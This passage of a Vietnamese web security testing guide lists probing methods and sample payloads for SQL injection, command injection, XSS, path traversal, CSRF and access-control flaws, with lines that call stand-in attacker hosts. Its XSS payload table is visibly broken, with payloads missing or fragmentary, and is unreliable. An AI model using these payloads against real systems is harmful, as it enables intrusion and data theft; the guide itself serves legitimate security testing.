 • Thực hiện gửi payload tấn công. Sau khi gửi lên thực hiện quan sát các dấu hiệu bất thường trong kết quả trả về để nhận diện lỗi. Sự bất thường ở đây thể hiện ở nội dung trả về, mã lỗi HTTP, chiều dài của phản hồi, thời gian phản hồi.

 • Phản hồi trả về phụ thuộc vào loại hệ quản trị cơ sở dữ liệu và loại lỗi SQL injection mắc phải. Có hai loại SQL injection là: Errors Base và Blind SQL injection. Đối với loại Error base, khi nhập đầu vào sai cho truy vấn, ứng dụng sẽ có thông báo lỗi trả về. Ví dụ:

Hình 61: SQL Injection dạng Errorsbase

 • Chú ý quan sát về mặt ngữ nghĩa của thông báo ( SQL Syntax và Error). Nếu gửi lên tham số với giá trị có kèm ’ mà gây ra lỗi, có thông báo bất thường thì tiếp tục đệ trình lại tham số đó nhưng có kèm thêm hai dấu ’. Nếu ứng dụng không còn xuất hiện lỗi nữa thì có khả năng mắc lỗi SQL injection.

Hình 62: Thử nghiệm với hai dấu nháy

 • Với trường hợp Blind SQL injection, sẽ có 3 dạng chính là:

 • Content-base: Thử nghiệm với những payload cộng logic xem có sự khác biệt trong nội dung trả về hay không. Ví dụ với câu truy vấn:

$getid \= "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

 • Thử nhập vào biến $id giá trị: ”1' and 1=2 – comment” (Nội dung mã tấn công không bao gồm dấu ”) để tạo thành mệnh đề ”false”. Khi đó sẽ không có nội dung trả về:

Hình 63: Blind SQL Injection

 • Nhúng vào biến $id giá trị: ”1' and 1=1 – comment” tạo thành mệnh đề ”true”. Nếu có nội dung trả về tương ứng với trường hợp $id có giá trị ban đầu là 1 thì ứng dụng mắc lỗi

 • Có thể sử dụng các hàm sau:

 • SUBSTRING (text, start, length): trả về substring start từ vị trí start và có độ dài length (nếu start lớn hơn độ dài của text, hàm sẽ trả về giá trị null)

 • ASCII (char): trả về giá trị ASCII của kí tự input. Trả về null nếu char is 0

 • LENGTH (text): trả về độ dài xâu kí tự.

Hình 64: Blind SQL injection

 • Time-base: Phương pháp này dựa vào thời gian thực hiện truy vấn của hệ quản trị cơ sở dữ liệu để xác định có mắc lỗi SQL injection hay không. Một số mã tấn công:

 • Đối với hệ quản trị MS SQL:

 • ’; waitfor delay ’0:30:0’

 • 1; waitfor delay ’0:30:0’--

 • Đối với hệ quản trị My SQL:
 • SELECT BENCHMARK(1000000,MD5(‘A’));

 • SELECT SLEEP(5); # >= 5.0.12

 • Đối với hệ quản trị Oracle:
 • BEGIN DBMS_LOCK.SLEEP(5); END;

 • SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual;

 • SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual;

 • SELECT UTL_HTTP.REQUEST(‘google.com’) FROM dual;

 • Nếu mắc lỗi ứng dụng sẽ trả về sau một thời gian tương ứng với giá trị đã truyền. Lưu ý so sánh với thời gian trả về của ứng dụng khi không mắc lỗi. Nên kiểm tra lại mã nguồn để tránh trường hợp xác định sai. Ví dụ:

Hình 65: Thời gian trả về khi bình thường

Hình 66: Thời gian trả về là 30s

 • Nếu như đã xác định được ứng dụng đã bị lỗi và cần xem thử khả năng khai thác lỗi đến đâu thì có thể dùng các công cụ như sqlmap, sqlninja, Haviji, … để đánh giá.

 • Lưu ý: Các mã tấn công sử dụng dấu nháy đơn (’).

Kiểm tra lỗi OS Command injection:

 • Tiến hành kiểm tra tại những điểm vào có khả năng mắc lỗi Command Injection. Quan sát kết quả trả về xem có gì đặc biệt. Ví dụ như chèn thêm lệnh ipconfig thì sẽ có kết quả trả về là thông tin địa chỉ ip card mạng.

 • Lưu ý là tập mã lệnh tấn công truyền vào phụ thuộc vào loại hệ điều hành máy chủ. Ví dụ như Windows có ipconfig, Linux có ifconfig. Chú ý chọn loại lệnh phù hợp.

 • Tiến hành lặp lại kiểm tra với việc thay đổi mã tấn công để xác định liệu ứng dụng bị lỗi thực sự hay không. Trường hợp ứng dụng mắc lỗi OS Command Injectiontion thì có thể sử dụng các công cụ khai thác để xem mức độ hệ thống bị ảnh hưởng bởi lỗi này.

 • Sử dụng dấu |, ||, & để kết nối hai câu lệnh với nhau. Cũng có thể thử sử dụng cả dấu pipe >.

Hình 67: Tấn công Command Injection

 • Một số mã tấn công:
 • || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &

 • | ping –i 30 127.0.0.1 |

 • | ping –n 30 127.0.0.1 |

 • & ping –i 30 127.0.0.1 &

 • & ping –n 30 127.0.0.1 &

 • ; ping 127.0.0.1 ;

 • %0a ping –i 30 127.0.0.1 %0a

 • ` ping 127.0.0.1 `

 • Lỗi nhúng mã thường dễ phát hiện khi rà soát mã nguồn, nhưng khó khi chạy kiểm thử chương trình. Xem xét trong mã nguồn có thể phân biệt rõ ràng giữa mã tấn công với câu truy vấn hay câu lệnh. Ví dụ như trong truy vấn SQL, cần phải sử dụng tất cả những biến đã được chuẩn bị sẵn hay thủ tục có sẵn, tránh sử dụng những câu truy vấn động.

 • Công cụ quét tự động có thể đưa ra những thông tin giúp kiểm tra ứng dụng có thực sự mắc lỗi hay không. Tuy nhiên, công cụ không thể biết được chắc chắn việc thực hiện tấn công có thành công. Những phần ứng dụng xử lý kém, công cụ giúp tìm ra lỗ hổng dễ dàng hơn.

Ví dụ tình huống:

 • Câu truy vấn SQL mà ứng dụng xây dựng như sau:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";

 • Kẻ tấn công có thể thay đổi tham số “id” trong trình duyệt để gửi đến: ‘ or ‘1’=’1. Việc này thay đổi ý nghĩa của câu truy vấn và trả về giá trị của tất cả tài khoản trong cơ sở dữ liệu thay vì chỉ của một nhân viên mà thôi.

http://example.com/app/accountView?id\=’ or ‘1’=’1

 • Trong trường hợp xấu nhất, kẻ tấn công có thể sử dụng điểm yếu này để thực thi những thủ tục trong cơ sở dữ liệu và giúp chiếm quyền điều khiển máy chủ cơ sở dữ liệu hoặc toàn bộ máy chủ.

4.2 Kiểm tra lỗi Cross-site-scripting(XSS)

 • Mô tả: Lỗi XSS rất phổ biến trong các ứng dụng web, xuất hiện khi ứng dụng nhận kèm dữ liệu đầu vào từ người dùng qua trang web, rồi gửi đến người khác mà không thông qua kiểm tra và xử lý. Kẻ tấn công chèn vào các website động (ASP, PHP, CGI, JSP ...) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML. Từ đó, kẻ tấn công có thể thực thi được script trên trình duyệt của nạn nhân để ăn cắp hay giả mạo phiên làm việc, thêm vào nội dung xấu, chuyển kết nối, tấn công trình duyệt bằng phần mềm độc hại. Có các loại XSS cơ bản sau:
 • Reflected XSS

 • Stored XSS

 • Dom base XSS

 • HTTP Header Injection

Phương pháp:

 • Tiến hành kiểm tra lỗi XSS với những điểm vào dự đoán từ trước. Thử truyền dữ liệu vào điểm vào ứng dụng, quan sát thông tin trả về để xem có mã nào gửi đi mà có xuất hiện trở lại. Nếu như có xuất hiện trong phần body thì kiểm tra lỗi liên quan đến Reflected XSS. Nếu xuất hiện lại trong phần header thì kiểm tra các lỗi liên quan đến HTTP Header Injection.

Hình 68: Kết quả trả về trong phần Body HTML

 • Trường hợp trong phần body xuất hiện giá trị mà đã gửi lên trong yêu cầu thì thử xem có thể thực thi được JavaScript bằng cách chèn các thẻ .

 • Thử gửi lên một vài mã tấn công có nội dung khai thác lỗi XSS và quan sát sự phản hồi từ ứng dụng để xác định ứng dụng có áp dụng các phương thức lọc như thế nào và khả năng vượt qua.

 • Nếu như ứng dụng chặn nội dung liên quan đến các thẻ script thì thực hiện HTML-encoding để thử xem có lọc trường hợp này hay không.

 • Quan sát các điểm mà ứng dụng lưu trữ dữ liệu liên quan đến tài khoản người dùng. Ví dụ như: phần comment, lưu thông tin như đổi tên thành viên, chữ ký... Nếu như việc lưu trữ mà không thực hiện lọc thì có thể thực hiện tấn công Store XSS.

 • Nếu như ứng dụng có lưu trữ dữ liệu do người dùng nhập vào và sử dụng kết quả hiển thị cho những lần sau thì thực hiện gửi các mã tấn công liên quan đến XSS để xem ứng dụng có bị tấn công Store XSS hay không.

 • Trường hợp mà giá trị xuất hiện trong phần Header thì kiểm tra liệu rằng ứng dụng có chấp nhận các dữ liệu URL encoded %0a và %0d mà làm ngắt phản hồi trong phần header. Nếu như kiểm tra thấy rằng có sự ngắt khi thực hiện chèn %0d và %0a trong phần header thì ứng dụng mắc lỗi Header Injection. Nếu như chỉ thấy một %d hoặc %0a trả về thì ứng dụng vẫn có khả năng khai thác mà phụ thuộc vào ngữ cảnh của trình duyệt.

 • Các công cụ có thể phát hiện XSS một cách tự động. Tuy nhiên, mỗi ứng dụng xây dựng khác nhau và sử dụng những nền tảng khác nhau như Javascript, ActiveX, Flash và Sliverlight, làm cho việc phát hiện lỗi khó khắn hơn. Cho nên, để đảm bảo đòi hỏi sự kết hợp giữa kiểm tra mã nguồn, kiểm chứng lại bằng tay bên cạnh những cách thức tự động.

STT

Mô tả

Mã tấn công

Malformed IMG tags

">

fromCharCode

Embedded tab

Embedded Encoded tab

Embedded newline to break up XSS

Embedded carriage return to break up XSS

Extraneous open brackets

<

No closing script tags

' Thông tin về phiên làm việc của nạn nhân sẽ được gửi đến trang web của kẻ tấn công, từ đó kẻ tấn công có thể ăn cắp được phiên làm việc. Lưu ý rằng kẻ tấn công có thể lợi dụng XSS để tấn công vào cơ chế chống CSRF của trang web. Vượt qua cơ chế lọc XSS: Trong một số trường hợp, dữ liệu trả về xuất hiện trong phần Attribute Value: Có thể sử dụng mã tấn công sau: " onfocus="alert(document.cookie) Trường hợp có sử dụng lọc, sử dụng cú pháp khác hoặc cơ chế encoding như: "%3cscript%3ealert(document.cookie)%3c/script%3e "> "> Một số trường hợp lọc mà không sử dụng cơ chế đệ quy, ví dụ như lọc từ khóa Sử dụng script từ nguồn bên ngoài: * example.com/?var="%20SRC="attacker.com/xss.js">

4.3 Kiểm tra lỗ hổng CSRF

 • Mô tả: CSRF (Cross-site request forgery) là phương pháp mượn quyền của người dùng khác để thực hiện một hành động không cho phép. Kẻ tấn công có thể giả mạo một yêu cầu và lừa nạn nhân gửi chúng đi qua các thẻ hình ảnh, XSS, hoặc rất nhiều kỹ thuật khác. Nếu người dùng đã được xác thực, việc tấn công sẽ thành công. Kẻ tấn công có thể khiến nạn nhân thay đổi dữ liệu mà nạn nhân được phép thay đổi hoặc thực thi những chức năng mà nạn nhân được phép thực thi.

Phương pháp:

 • Tiến hành kiểm tra tại những chức năng quan trọng, điểm vào dự đoán có khả năng mắc lỗi CSRF. Nếu như ứng dụng chỉ dựa vào mỗi HTTP cookies thì ứng có nguy cơ mắc lỗi CSRF. Xem xét mỗi đường liên kết hay form có sử dụng token hay không. Nếu không sử dụng, kẻ tấn công có thể giả mạo yêu cầu.

 • Quan sát các chức năng cốt lõi của ứng dụng và xác định các yêu cầu thực hiện đối với các dữ liệu nhạy cảm, nếu như mà kẻ tấn công có thể xác định được toàn bộ tham số đối với các yêu cầu (cho dù không thể xác định HTTP cookies) thì ứng dụng vẫn mắc lỗi CSRF.

 • Tạo ra trang HTML mà thực hiện những yêu cầu mong muốn mà không có sự tương tác về người dùng. Đối với các yêu cầu sử dụng GET thì có thể sử dụng thẻ với tham số src=”chứa liên kết”. Nếu như yêu cầu là POST có thể tạo ra những trường ẩn để chứa tham số và có thể sử dụng Javascript để thực hiện tự động gửi form ngay sau khi trang được nạp.

Ví dụ tình huống:

 • Ứng dụng cho phép người dùng gửi đi yêu cầu chuyển tiền mà không sử dụng token như:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

 • Từ đó, kẻ tấn công có thể tạo ra những yêu cầu chuyển từ tài khoản nạn nhân đến tài khoản của mình và đính kèm những yêu cầu này trong thẻ hình ảnh hoặc iframe rồi đưa chúng lên những website mà kẻ tấn công điều khiển:
 • Nếu nạn nhân truy cập vào bất cứ trang web nào trong khi đang có phiên làm việc tại example.com thì yêu cầu giả mạo này sẽ được thực thi thành công.

4.4 Kiểm tra các thao tác với file

 • Mô tả: Các thao tác với file thường sử dụng tên file, đường dẫn file được gửi lên từ client, nếu ứng dụng không kiểm soát tốt các giá trị này (việc kiểm soát phải được thực hiện phía server) có thể dẫn đến việc download hoặc upload các file không hợp lệ. Những tên, đường dẫn này do người dùng gửi lên, nếu không được kiểm tra trước khi chuyển vào hệ thống xử lý sẽ tạo điều kiện cho kẻ tấn công khai thác. Bằng việc tùy chỉnh tên file, đường dẫn, kẻ tấn công có thể đọc, truy cập tới các file trên hệ thống, thậm chí cả file chứa mật khẩu nếu cấu hình không tốt. Nguy hiểm hơn, bằng cách điều khiển đường dẫn, kẻ tấn công có thể chèn vào một đoạn mã độc, và thực thi chúng. Từ đó, kẻ tấn công có thể chiếm quyền điều khiển hệ thống.

Phương pháp:

 • Tiến hành kiểm tra tại những điểm vào dự đoán có khả năng mắc lỗi thao tác với file. Ví dụ như:
 • Tiến hành thay đổi nội dung điểm vào bằng cách đọc thử nội dung file khác (/etc/passwd trên Linux hoặc C:/boot.ini trên Windows). Một phương pháp khác là thử thay đổi nội dung trỏ đến một file không tồn tại, ví dụ như page=anything.html.

 • Sẽ có 2 khả năng xảy ra khi thực hiện thay đổi nội dung tại các điểm vào này. Một là ứng dụng sẽ xứ lý tiếp hoặc là thông báo về việc sai đường dẫn trên ứng dụng. Nếu thông báo lỗi sai đường dẫn thì mắc lỗi không kiểm tra khi thao tác với file.

 • Trường hợp không báo lỗi, nếu kết quả trả về chứa nội dung như yêu cầu (nội dung file /etc/passwd hoặc boot.ini) thì mắc lỗi.

 • Trong một số trường hợp include được dùng như sau: include($page.”.html”) thì sử dụng phương pháp null-byte, thêm %00 ở phía sau. Kí tự null kết thúc chuỗi, gặp %00 là tự hiểu kết thúc chuỗi và bỏ qua các kí tự cuối cùng, ở trường hợp trên là bỏ đuôi .html

 • Ví dụ: index.php?page=/etc/passwd%00

 • Trong trường hợp không sử dụng được đường dẫn tuyệt đối, sử dụng đường dẫn tương đối để include file trong cùng thư mục. Sử dụng dấu “../” hoặc “..\” để di chuyển lên thư mục cha. Ví dụ:

 • ../../../../../../../../../../etc/passwd

 • ../../../../../../../../../../boot.ini

 • ..\..\..\..\..\..\..\..\..\..\etc\passwd

 • ..\..\..\..\..\..\..\..\..\..\boot.ini

 • Một số đường dẫn file thông thường:

STT

Mô tả

Đường dẫn

Apache httpd

ServerRoot

/usr/local/apache2

DocumentRoot

/usr/local/apache2/htdocs

Apache Config File

/usr/local/apache2/conf/httpd.conf

Other Config Files

/usr/local/apache2/conf/extra/

SSL Config File

/usr/local/apache2/conf/ssl.conf

ErrorLog

/usr/local/apache2/logs/error_log

AccessLog

/usr/local/apache2/logs/access_log

Fedora Core, CentOS, RHEL

ServerRoot

/etc/httpd

Primary Config Fle

/etc/httpd/conf/httpd.conf

Other Config Files

/etc/httpd/conf.d

DocumentRoot

/var/www/html

ErrorLog

/var/log/httpd/error_log

AccessLog

/var/log/httpd/access_log

Win32

ServerRoot

"C:/Program Files/Apache Software Foundation/Apache2.2"

Config Fle

"C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf"

DocumentRoot

"C:/Program Files/Apache Software Foundation/Apache2.2/htdocs"

ErrorLog

"C:/Program Files/Apache Software Foundation/Apache2.2/logs/error.log"

AccessLog

"C:/Program Files/Apache Software Foundation/Apache2.2/logs/access.log"

Ví dụ tình huống:

 • Ứng dụng sử dụng cơ chế chèn file với mỗi trang nội dung tương ứng. Ví dụ phần help sẽ chèn vào trang help. URL của đường dẫn sẽ có dạng:
 • Kẻ tấn công dự đoán ứng dụng có thể mắc lỗi thao tác file. Kẻ tấn công có thể sử dụng “../” để thử liệu có truy cập file và thư mục khác được không:
 • Nếu thành công, kẻ tấn công sẽ hiển thị được nội dung file hệ thống.

4.5 Kiểm tra mã hóa dữ liệu nhạy cảm

 • Mô tả: Sai lầm phổ biến là không mã hóa các dữ liệu cần được mà hóa. Khi mã hóa được sử dụng, vấn đề lưu trữ và sinh khóa không an toàn, khóa không được thường xuyên thay đổi, hay sử dụng thuật toán yếu. Sử dụng mật khẩu dễ đoán hoặc thuật toán hàm băm mà không thêm giá trị ngẫu nhiên (salt) cũng là một lỗi phổ biến.

Phương pháp:

 • Trước tiên cần xác định thông tin nào nhạy cảm đến mức cần phải yêu cầu bảo mật. Ví dụ như: mật khẩu, thẻ tín dụng, các thông tin cá nhân nên được mã hóa. Đối với các dữ liệu này, cần kiểm tra:
 • Những thông tin này có được mã hóa khi lưu trữ hay không.

 • Những mức người dùng nào được phép truy cập vào bản sao được giải mã của dữ liệu.

 • Có sử dụng một thuật toán mã hóa mạnh và được sử dụng theo tiêu chuẩn hay không. Nếu không cần giải mã thì cần phải sử dụng các thuật toán hash.

 • Khóa dùng để mã hóa được tạo và bảo vệ tránh khỏi truy cập trái phép không ? Có định kỳ thay đổi khóa không.

 • Trường hợp có tài khoản quản trị cơ sở dữ liệu, tiến hành vào trực tiếp cơ sở dữ liệu để xem có sử dụng mã hóa hay không.

Hình 69: Phân tích DB lấy thông tin về mã hóa

Ví dụ tình huống:

 • Một cơ sở dữ liệu về mật khẩu được lưu trữ mà không sử dụng salt. Một lỗi tải file đã được kẻ tấn công khai thác, lấy được các tập tin mật khẩu. Tất cả mật khẩu unsalt hashes bị giải mã chỉ trong 4 tuần, trong khi đối với những hashes nếu được tạo ra đúng cách (có sử dụng salt) việc giải mã sẽ phải mất hơn 3000 năm.

4.6 Kiểm tra phân quyền truy cập của người dùng

 • Mô tả: Các ứng dụng thường không được tạo ra để bảo vệ các yêu cầu truy cập trang đúng cách. Trong một số trường hợp, việc bảo vệ đường dẫn được quản lý thông qua cấu hình, và đôi khi hệ thống bị cấu hình sai sót. Các lập trình viên cũng đôi khi quên tích hợp đoạn mã kiểm tra quyền.

 • Sai sót như vậy cho phép kẻ tấn công truy cập trái phép vào một số chức năng cần bảo vệ. Thông thường giao diện quản trị là mục tiêu chính cho kiểu tấn công này.

Phương pháp:

 • Xác định xem ứng dụng được phân quyền truy cập theo chiều dọc hay chiều ngang. Chiều dọc là có các mức quyền khác nhau, mức quyền thấp hơn không được truy cập tài nguyên mức quyền cao hơn. Chiều ngang là những tài khoản cùng mức quyền có tài nguyên riêng, không được truy cập tài nguyên của tài khoản cùng mức.

 • Trong các hệ thống có phân quyền, mỗi người chỉ được phép truy cập vào các dữ liệu mình được phép. Để xác định ứng dụng có phân quyền đúng hay không thì cần xác định các trang, tìm hiểu mục đích các trang này là công khai hay cá nhân. Nếu là một trang cá nhân:

 • Có cần chứng thực để truy cập vào trang đó.

 • Trang có cung cấp quyền truy cập cho tất cả người dùng đã được xác thực. Nếu không, có cần một xác minh để đảm bảo người dùng có quyền mới được truy cập vào trang đó.

 • Lỗ hổng thường được phát hiện ra khi xuất hiện những đường liên kết, nút bấm mà thông thường không được hiển thị với người dùng bình thường. Thường sử dụng hai tài khoản, ở mức người dùng khác nhau, thử truy cập vào những liên kết đã biết của người dùng mức cao hơn để xác định ứng dụng có mắc lỗi không. Nếu không có trước các tài khoản ở các cấp độ đặc quyền khác nhau, hoặc nhiều tài khoản với quyền truy cập vào dữ liệu khác nhau thì việc kiểm tra các lỗi thường sẽ khó hơn, bởi vì sẽ không biết rõ tên các URLs, các tham số mà cần thiết cho việc khai thác các lỗi.

 • Nếu được đặt trong tình huống sử dụng với các tài khoản mức thấp khi truy cập ứng dụng thì thử nhận diện các URL mà có đặc quyền cao hơn, ví dụ như các URL liên quan đến tài khoản quản trị.

 • Hầu hết các dữ liệu trong điều khiển truy cập đều dựa vào định danh, thông thường là các chỉ số. Thử đoán và xác định các định danh liên quan đến người sử dụng. Có thể sử dụng các công cụ để sinh ra các định danh và quan sát.

 • Một số ứng dụng khởi tạo việc điều khiển truy cập dựa trên những tham số của các yêu cầu. Thử tìm kiếm những tham số như là edit=false hoặc access=read trong các yêu cầu và thực hiện thay đổi nó trong vai trò của người dùng để xác định lỗi có thể xảy ra.

Ví dụ tình huống:

 • Kẻ tấn công nhắm mục tiêu vào các URL. Cả hai URL sau đây đều yêu cầu chứng thực. Quyền quản trị cũng phải được cung cấp để truy cập vào trang “admin_getappinfo”:
 • Nếu kẻ tấn công không được chứng thực mà vẫn có thể truy cập vào trang, thì đó gọi là truy cập trái phép. Nếu một người sử dụng được chứng thực, nhưng lại không phải trong ban quản trị, vẫn truy cập được vào trang “admin_getappinfo” thì đây là một lỗ hổng cho phép kẻ tấn công truy cập vào trang quản trị.

4.7 Kiểm tra liệt kê người dùng

 • Mô tả: Tại những những chức năng liên quan đến xác thực, ứng dụng phân biệt thông báo lỗi giữa sai mật khẩu và sai tên người dùng, người dùng không tồn tại…

Phương pháp:

 • Tiến hành kiểm tra tại những điểm vào mà thông tin đăng nhập (tên đăng nhập) sẽ được gửi (có thể trong form, trường ẩn, cookies) đến ứng dụng (ví dụ như: đăng nhập, đăng kí, khôi phục mật khẩu, thay đổi mật khẩu, …).

 • Đối với mỗi vị trí hãy thử với tên đăng nhập hợp lệ và không hợp lệ. Sau đó quan sát sự phản hồi từ ứng dụng (thông báo, trường ẩn, trang thái của HTTP, bất kỳ sự chuyển hướng nào).

 • Việc thử so sánh các cặp dữ liệu tên đăng nhập hợp lệ và không hợp lệ sẽ nhận biết được điểm khác biệt giữa các tên đăng nhập về mặt ứng dụng hoặc ngữ nghĩa mà từ đó rút ra cách điều tra thông tin tên đăng nhập.

 • Kiểm tra những thành phần khác của ứng dụng mà có thể vô tình để lộ thông tin tên đăng nhập. Ví dụ như chức năng tìm kiếm tên đăng nhập trùng tên lúc đăng ký tài khoản.

4.8 Kiểm tra Session Fixation

 • Mô tả: Người dùng trong lần đầu tiên truy cập ứng dụng đều được cấp phát một session, gọi là “anonymous session”. Session Fixation xuất hiện khi ứng dụng có bao gồm chức năng đăng nhập, người dùng sau khi xác thực thành công nhưng vẫn sử dụng “anonymous session” cũ mà không cập nhật session mới.

 • Kẻ tấn công lợi dụng điểm này, gửi mã tấn công đến người dùng, với mục đích gán session của người chính là session của kẻ tấn công. Người dùng sau khi đăng nhập, vì session không đổi, nên session đó sẽ là session của tài khoản đã được xác thực, và cũng là session của kẻ tấn công. Do đó, kẻ tấn công có thể sử dụng lỗ hổng này để đăng nhập mà không cần biết thông tin người dùng và mật khẩu.

Phương pháp:

 • Nếu ứng dụng không cấp phát một session mới sau khi đã đăng nhập thành công mà người dùng chưa xác thực có thể sử dụng session cũ thì ứng dụng mắc lỗi session fixation.

 • Nhận diện định dạng của session của ứng dụng. Thử thay đổi dữ liệu của session và sử dụng chúng. Nếu như ứng dụng chấp nhận các session mà người dùng khám phá thì ứng dụng đó mắc lỗi session fixation.

4.9 Kiểm tra lỗi liên quan đến chuyển hướng

 • Mô tả: Các ứng dụng thường chuyển hướng người dùng đến các trang khác, hoặc sử dụng trang chuyển tiếp nội bộ một cách tương tự. Đôi khi các trang đích được quy định trong một tham số mà không được kiểm tra, cho phép kẻ tấn công lựa chọn trang đích.

 • Kẻ tấn công tạo ra những đường dẫn liên kết rồi lừa người dùng vào. Người dùng sẽ không để ý vì đó là một đường dẫn từ một trang hợp lệ. Những chuyển hướng như vậy có thể hướng người dùng tới một trang, từ đó cài đặt phần mềm độc hại hoặc lừa nạn nhân khai báo mật khẩu, các thông tin nhạy cảm khác. Chuyển hướng không an toàn có thể cho phép vượt qua các bước kiểm tra truy cập.

Phương pháp:

 • Kiểm tra tại các điểm vào, đường liên kết cho phép chuyển hướng. Nếu như ứng dụng có tham số là các đường dẫn URL tuyệt đối thì thực hiện kiểm tra với các URL khác thử xem ứng dụng có bị chuyển đến các domain khác hay không.

 • Xem lại mã nguồn có sử dụng chuyển hướng hay không. Đối với mỗi lần sử dụng, xác định nếu các URL đích được chứa trong giá trị, danh sách nào không. Nếu không, ứng dụng có thể mắc lỗi liên quan đến chuyển hướng.

Ví dụ tình huống:

 • Ứng dụng có một trang gọi là “redirect.jsp” mà có một tham số duy nhất có tên là “url”. Kẻ tấn công tạo ra một URL độc hại để hướng người dùng đến một trang web độc hại nhằm thực hiện lừa đảo và cài đặt các phần mềm độc hại.
 • Ứng dụng sử dụng chuyển tiếp để di chuyển yêu cầu giữa các thành phần khác nhau của trang web. Để tạo điều kiện này, một số trang sử dụng một tham số để chỉ ra nơi người dùng phải được gửi nếu giao dịch thành công. Trong trường hợp này, kẻ tấn công tạo ra một URL sẽ vượt qua kiểm tra truy cập của ứng dụng và sau đó chuyển tiếp kẻ tấn công vào những chức năng quản trị bình thường không truy cập được.

4.10 Kiểm tra chính sách mật khẩu mạnh

 • Mô tả: Nếu không có chính sách về mật khẩu mạnh, người dùng sẽ sử dụng những mật khẩu đơn giản, dễ nhớ. Điều này tạo điều kiện cho kẻ tấn công dễ dàng đoán được mật khẩu người dùng, từ đó có thể chiếm tài khoản người dùng.

Phương pháp:

 • Quan sát bất kỳ sự mô tả nào liên quan đến việc áp dụng chính sách cho tài khoản người dùng. Thông thường những phần này ở phần đăng ký, đổi mật khẩu.

 • Thử thiết lập một danh sách các mật khẩu yếu, sử dụng cơ chế cho phép tự đăng kí hoặc chức năng thay đổi mật khẩu để đoán biết được các chính sách được áp đặt cho mật khẩu. Thử mật khẩu chỉ chứa các kí tự hoặc chỉ chứa số hoặc trùng tên đăng nhập, …

 • Thực hiện đoán luật được áp đặt cho mật khẩu có thể bằng cách thiết lập một mật khẩu đủ mạnh (độ dài, ký tự, số, ký tự đặc biệt), sau đó lần lượt đăng nhập vào hệ thống và gỡ bỏ dần các tình huống như ký tự đặc biệt, số, chữ, độ dài để xem liệu ứng dụng có áp đặt việc kiểm tra nào hay không đối với ứng dụng.

 • Nếu có được luật áp đặt cho tài khoản thì việc xây dựng từ điển tấn công mật khẩu sẽ chính xác và hoàn chỉnh hơn.

II. Quy trình kiểm tra an toàn thông tin mã nguồn ứng dụng web

 • Một ứng dụng có thể chứa đến hàng ngàn, thậm chí hàng trăm ngàn dòng mã lệnh. Và trong hầu hết trường hợp, thời gian để xem lại tất cả dòng mã lệnh đó là hạn chế. Thông thường, thời gian này chỉ là một vài ngày. Trong khi đó, mục tiêu của rà soát của ứng dụng dựa trên mã nguồn là tìm kiếm được tối đa các lỗi có khả năng mắc phải.

 • Để làm được điều này, cần phải có một phương pháp tiếp cận hiệu quả. Trong đó, thời gian để xác định trong mã nguồn phải được tiến hành nhanh chóng. Phần lớp thời gian dành cho việc phân tích, tìm kiếm những vấn đề khó khăn, phức tạp hơn.

1. Khái niệm

1.1 Điểm cuối ứng dụng

 • Điểm cuối ứng dụng là vị trí trong mã nguồn mà ở đó ứng dụng tiến hành tương tác với ứng dụng, hệ thống thông qua những hàm API. Có các dạng tương tác chính là:
 • File system calls (Read/Write)

 • Operating system calls

 • Network/Socket calls

 • SQL interfaces

 • Tương ứng với mỗi loại tương tác, mỗi loại ngôn ngữ sẽ có những loại API cụ thể.

1.2 Trace

 • Trong việc đánh giá mã nguồn, khái niệm trace có nghĩa là tiến hành tìm kiếm, vẽ lại đường đi từ điểm vào ứng dụng, cho tới điểm cuối. Có thể chỉ trong 1,2 dòng lệnh, nhưng cũng có những trường hợp sử dụng đổi biến, toán tử… để thay đổi.

 • Trace có thể dẫn đến nhiều nhánh, một điểm vào có thể có nhiều nhánh khác nhau, tới nhiều điểm cuối khác nhau. Tương tự, một điểm cuối cũng có thể xuất phát từ nhiều điểm vào.

Hình 70: Sơ đồ trace từ điểm vào ứng dụng tới điểm cuối ứng dụng.

2. Phương pháp đánh giá an toàn thông tin mã nguồn ứng dụng web

 • Nội dung của phương pháp đánh giá dựa vào mã nguồn là xuất phát từ điểm vào, đi tới điểm cuối để kiểm tra xem có mắc lỗi ATTT hay không. Cụ thể gồm các bước:
 • Tìm kiếm tất cả điểm vào ứng dụng (entry point).

 • Trace theo luồng xử lý điểm vào ứng dụng cho tới điểm cuối (end-point). Trong quá trình trace chú ý kiểm tra xem có sử dụng lọc – filter không.

 • Dự đoán khả năng mắc lỗi.

 • Kiểm tra lại khả năng mắc lỗi.

2.1 Tìm kiếm điểm vào ứng dụng

 • Tùy đặc trưng của mỗi ngôn ngữ sẽ có cách xử lý khác nhau. Sử dụng phương pháp tìm kiếm mẫu, liệt kê tất cả điểm vào ứng dụng. Tương tư với điểm vào ứng dụng theo phương pháp Blackbox, điểm vào ứng dụng theo phương pháp mã nguồn là vị trí code mà nhận yêu cầu từ người dùng gửi lên, thông thường là những API nhận dữ liệu từ người dùng.

 • Điểm vào ứng dụng phụ thuộc đặc trưng của từng ngôn ngữ. Tài liệu tập trung vào ba ngôn ngữ chính là: PHP, ASP và Java.

A. Ngôn ngữ Java:

 • Ứng dụng Java tiếp nhận dữ liệu đệ trình từ người dùng thông qua javax.servlet.http. Giao diện HttpServletRequest là mở rộng của giao diện javax.servlet.ServletRequest. Hai giao diện này cung cấp rất nhiều APIs cho phép ứng dụng web truy cập vào nguồn dữ liệu do người dùng đệ trình. Danh sách các APIs được liệt kê trong bảng sau:

API

Mô tả

getParameter

getParameterNames

getParameterValues

getParameterMap

APIs cung cấp truy cập Parameters trong URL query string, POST body request.

getQueryString

Trả về query string, có thể dùng thay thế cho getParameter

getHeader

getHeaders

getHeaderNames

Trả về HTTP headers của request

getRequestURI

getRequestURL

Trả về URL chứa query string

getCookies

Trả về mảng Cookie

getRequestedSessionId

Trả về Session ID của request, có thể thay thế getCookies trong một số trường hợp

getInputStream

getReader

APIs cung cấp request dạng raw, được sử dụng bởi những APIs khác.

getMethod

Trả về Method của HTTP request

getProtocol

Trả về Protocol của HTTP request

getServerName

Trả về giá trị HTTP Host header
